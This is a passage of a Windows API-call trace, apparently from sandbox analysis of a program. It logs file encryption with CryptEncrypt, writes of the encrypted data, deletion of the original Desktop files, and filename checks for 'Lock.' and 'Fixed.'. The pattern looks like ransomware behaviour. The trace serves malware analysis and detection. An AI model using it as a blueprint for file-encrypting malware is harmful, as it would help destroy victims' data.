lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0103.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9cb8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0103.973] CryptEncrypt (in: hKey=0x9a4480, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xd499, dwBufLen=0xd4a0 | out: pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xd4a0) returned 1 [0103.975] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0103.975] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0103.976] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0103.976] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0103.976] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0103.976] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0103.980] WriteFile (in: hFile=0x458, lpBuffer=0x2a7a130*, nNumberOfBytesToWrite=0xd4a0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesWritten=0x8cf5e4*=0xd4a0, lpOverlapped=0x0) returned 1 [0103.982] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0103.982] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0103.982] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.982] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.982] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0103.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9af0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0103.982] CryptDestroyKey (hKey=0x9a4480) returned 1 [0103.982] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0103.982] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0103.983] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0103.983] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0103.983] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0103.983] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0103.983] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0103.983] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0103.983] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0103.983] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0103.983] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0103.983] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0103.983] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.983] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.983] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0103.983] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0103.983] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0103.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f00, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0103.983] CryptReleaseContext (hProv=0x9be918, dwFlags=0x0) returned 1 [0104.027] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0104.027] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0104.027] FreeLibrary (hLibModule=0x76390000) returned 1 [0104.027] CloseHandle (hObject=0x44c) returned 1 [0104.029] CloseHandle (hObject=0x458) returned 1 [0104.033] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0104.033] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0104.033] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/og9u_G4EHl49Tl.flv", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\og9u_G4EHl49Tl.flv", lpFilePart=0x8cedf4*="og9u_G4EHl49Tl.flv") returned 0x2a [0104.033] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\og9u_G4EHl49Tl.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\og9u_g4ehl49tl.flv")) returned 0x20 [0104.033] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\og9u_G4EHl49Tl.flv", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7910b730, ftCreationTime.dwHighDateTime=0x1d5d221, ftLastAccessTime.dwLowDateTime=0x2c63f080, ftLastAccessTime.dwHighDateTime=0x1d5cce2, ftLastWriteTime.dwLowDateTime=0x2c63f080, ftLastWriteTime.dwHighDateTime=0x1d5cce2, nFileSizeHigh=0x0, nFileSizeLow=0xd499, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="og9u_G4EHl49Tl.flv", cAlternateFileName="OG9U_G~1.FLV")) returned 0x9a3b80 [0104.034] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\og9u_G4EHl49Tl.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\og9u_g4ehl49tl.flv")) returned 1 [0104.107] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7910b730, ftCreationTime.dwHighDateTime=0x1d5d221, ftLastAccessTime.dwLowDateTime=0x2c63f080, ftLastAccessTime.dwHighDateTime=0x1d5cce2, ftLastWriteTime.dwLowDateTime=0x2c63f080, ftLastWriteTime.dwHighDateTime=0x1d5cce2, nFileSizeHigh=0x0, nFileSizeLow=0xd499, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="og9u_G4EHl49Tl.flv", cAlternateFileName="OG9U_G~1.FLV")) returned 0 [0104.107] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0104.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75c90 | out: hHeap=0x2af0000) returned 1 [0104.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0104.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0104.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0104.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0104.108] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0104.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0104.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0104.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0104.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0104.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0104.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0104.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0104.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0104.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0104.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0104.108] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0104.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0104.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0104.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0104.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0104.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0104.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90e8 [0104.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0104.108] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0104.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0104.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6178 [0104.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0104.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0104.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0104.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0104.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0104.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0104.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0104.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0104.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0104.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0104.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0104.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0104.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0104.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0104.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a751c8 [0104.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6178 | out: hHeap=0x2af0000) returned 1 [0104.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0104.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0104.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0104.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0104.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0104.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0104.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0104.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0104.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0104.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0104.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0104.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0104.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0104.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0104.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0104.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0104.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0104.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0104.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0104.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x56) returned 0x2a5fa80 [0104.110] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/og9u_G4EHl49Tl.flv", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\og9u_G4EHl49Tl.flv", lpFilePart=0x8cf650*="og9u_G4EHl49Tl.flv") returned 0x2a [0104.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5fa80 | out: hHeap=0x2af0000) returned 1 [0104.110] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\og9u_G4EHl49Tl.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\og9u_g4ehl49tl.flv")) returned 0xffffffff [0104.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a751c8 | out: hHeap=0x2af0000) returned 1 [0104.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0104.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0104.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0104.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0104.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0104.111] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0104.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0104.111] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0104.111] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0104.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0104.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0104.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0104.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0104.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0104.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0104.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0104.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0104.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0104.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0104.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0104.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0104.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0104.111] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QgQCsu7ShKSSIL.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0104.111] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gQCsu7ShKSSIL.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0104.111] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QCsu7ShKSSIL.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0104.111] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Csu7ShKSSIL.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0104.111] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="su7ShKSSIL.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0104.111] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u7ShKSSIL.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0104.112] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7ShKSSIL.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0104.112] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ShKSSIL.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0104.112] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hKSSIL.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0104.112] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KSSIL.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0104.112] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SSIL.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0104.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SIL.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0104.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IL.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0104.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0104.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0104.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0104.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0104.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0104.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0104.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0104.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0104.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0104.116] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0104.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0104.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0104.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0104.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0104.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0104.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0104.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0104.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0104.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0104.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0104.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0104.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0104.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0104.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0104.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0104.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0104.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0104.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0104.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x26) returned 0x2a69b80 [0104.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0104.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QgQCsu7ShKSSIL.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0104.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gQCsu7ShKSSIL.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0104.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QCsu7ShKSSIL.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0104.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Csu7ShKSSIL.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0104.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="su7ShKSSIL.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0104.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u7ShKSSIL.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0104.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7ShKSSIL.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0104.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ShKSSIL.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0104.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hKSSIL.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0104.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KSSIL.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0104.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SSIL.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0104.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SIL.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0104.117] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IL.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0104.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0104.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6450 [0104.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0104.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6450 | out: hHeap=0x2af0000) returned 1 [0104.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0104.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: 